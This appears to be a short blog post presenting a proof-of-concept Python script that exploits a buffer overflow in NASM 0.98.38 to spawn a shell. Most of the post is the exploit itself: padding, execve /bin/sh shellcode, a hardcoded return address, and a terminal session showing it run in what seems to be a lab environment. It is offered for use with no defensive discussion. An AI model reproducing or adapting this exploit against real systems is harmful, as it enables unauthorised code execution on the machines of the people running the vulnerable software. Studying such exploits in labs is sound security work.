Like before, I wrote another poc to get shell via overflow in old nasm.
Check it out:
reader@hacking:~/src/COREs $ vim nasmsh.py
---<code>---
#!/usr/bin/env python
# -------------------------
# 0day poc for nasm 0.98.38
# 28.04.2015
from subprocess import call
flex = '/usr/bin/nasm'
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "A"*4076
ret = "\x6c\xfb\xff\xbf"
payload = nops + shellcode + ret
call([flex,payload])
print 'Done\n\n'
---<code>---
reader@hacking:~/src/COREs $ chmod u+x nasmsh.py
reader@hacking:~/src/COREs $ nasm -v
NASM version 0.98.38 compiled on Jun 27 2005
reader@hacking:~/src/COREs $ sh
sh-3.2$ ./nasmsh.py
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
reader@hacking:/home/reader/src/COREs $ exit
exit
Done
sh-3.2$
---
Cheers
o/
No comments:
Post a Comment
What do You think...?